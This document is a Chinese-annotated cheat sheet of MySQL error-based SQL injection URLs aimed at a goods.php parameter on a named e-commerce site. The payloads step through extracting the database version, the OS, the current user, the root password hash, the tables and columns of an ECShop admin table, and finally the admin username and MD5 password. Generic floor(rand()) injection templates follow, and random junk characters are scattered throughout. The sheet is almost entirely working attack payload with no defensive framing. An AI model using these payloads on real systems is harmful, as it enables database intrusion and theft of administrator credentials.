判断版本号
" c% t9 _+ x$ s/ Xhttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23* }; r; N) X# A `# L* x* r7 C0 C
, ^/ O% x Y9 K9 ^& D
判断系统- ~, |* W2 l- @" i' y# m+ E
2 w; I% u# c$ M& T+ y$ Qhttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version_compile_os%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
) A) t0 \2 s: k% r* s# h& X( I8 o- N. a9 O5 d1 \& }
5 z9 @3 f, E. [- M
, B* ? h% }8 \' F% V: x% j& _当前 user()
$ m. y7 |( R! t; f9 I) J! k9 G
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20user()%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
6 [* I' u! k- [# Q, z+ R# k0 S6 U# V p
+ P% K2 U- K8 g2 g2 _: U4 o: }
当前 database()5 S2 u2 O g0 Q$ E$ B; h9 a
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20database()%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
% ]0 [/ f. g5 ~
/ Q8 ]$ H' p5 l% C0 v3 D6 A- _0 \4 p
* D' I: l2 t1 X g3 p. P/ [
6 `! ~3 e( W& O/ g: p! I
# E7 Q; h' [ \7 ~root hash {8 Z# ]! ]3 a! d# Q' c# }4 R
2 P3 H; e5 P! }3 {) I
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20Password%20from%20mysql.user%20where%20User=char(114,111,111,116)),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
& R( O* c) W* M
7 m T/ D% _4 P) p
$ r4 J7 f/ @, d/ D' v0 D: H
" Z. a* C( z# Q# b9 q当前 数据库表名& C+ z, g# r. U6 p: |
4 ]7 Q5 }" ]# n3 @7 }' w& O
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20TABLE_NAME%20%20from%20information_schema.tables%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20limit%206,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
9 |6 Y3 b( F, E$ J6 H$ y8 z# O2 S8 y9 E5 Q7 a- j
5 ^' B, T% j) d- ^7 L( T4 i! l$ i& g* I5 z3 j
当前 数据库 user_name 字段+ z" S+ b9 C8 U) g: F, l: A. }
6 f! a5 T" \* g3 u! ]/ Y/ d* F _
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20%20COLUMN_NAME%20from%20information_schema.COLUMNS%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20and%20TABLE_NAME=char(101,99,115,95,97,100,109,105,110,95,117,115,101,114)%20limit%202,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23+ {& N' P" [! V$ E/ O1 h
; I* \; `5 G4 B
当前 数据库 字段 password ]& ?% D, C+ o! V$ M
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20%20COLUMN_NAME%20from%20information_schema.COLUMNS%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20and%20TABLE_NAME=char(101,99,115,95,97,100,109,105,110,95,117,115,101,114)%20limit%204,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%231 S! l' V" l/ x9 O. X; [' I3 L
! o6 n% A+ p9 x' w0 q; i# r; L4 l" E8 D* v3 n i
) M/ W# h7 d$ C% p" X7 x J
获得 admin passwd(md5). g2 b. N$ H5 V
% Q# V( e% Y6 B' f8 R' T
- ~. N7 v3 g, k0 ?: I$ ]http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20concat_ws(char(94),ifnull(cast(%60password%60%20as%20char),char(32)),ifnull(cast(%60user_name%60%20as%20char),char(32)))%20%20from%20sansan1.ecs_admin_user%20limit%200,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
6 O0 b3 S+ R- Y/ u/ F2 m
9 G2 z) `: G1 X' B' ^, f3 `报错注射
! e6 P. h$ K9 S3 OSELECT * FROM table_name where uid = -1 union select 1,(select 1 from(select count(*),concat((select (Select version()) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)
" Z9 w9 w5 O# R8 \3 E
/ D0 D6 w# H" t% @! j- kSELECT * FROM table_name where uid = -1 union select 1,(select 1 from(select count(*),concat((select (Select username FROM admin_table LIMIT 0,1) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)
) V3 j0 T( ?9 V( f
9 Y; V( W6 ^4 D3 k5 Vand(select 1 from(select count(*),concat((select (select (Select concat(0x7e,0x27,SCHEMA_NAME,0x27,0x7e) FROM information_schema.SCHEMATA LIMIT 21,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) |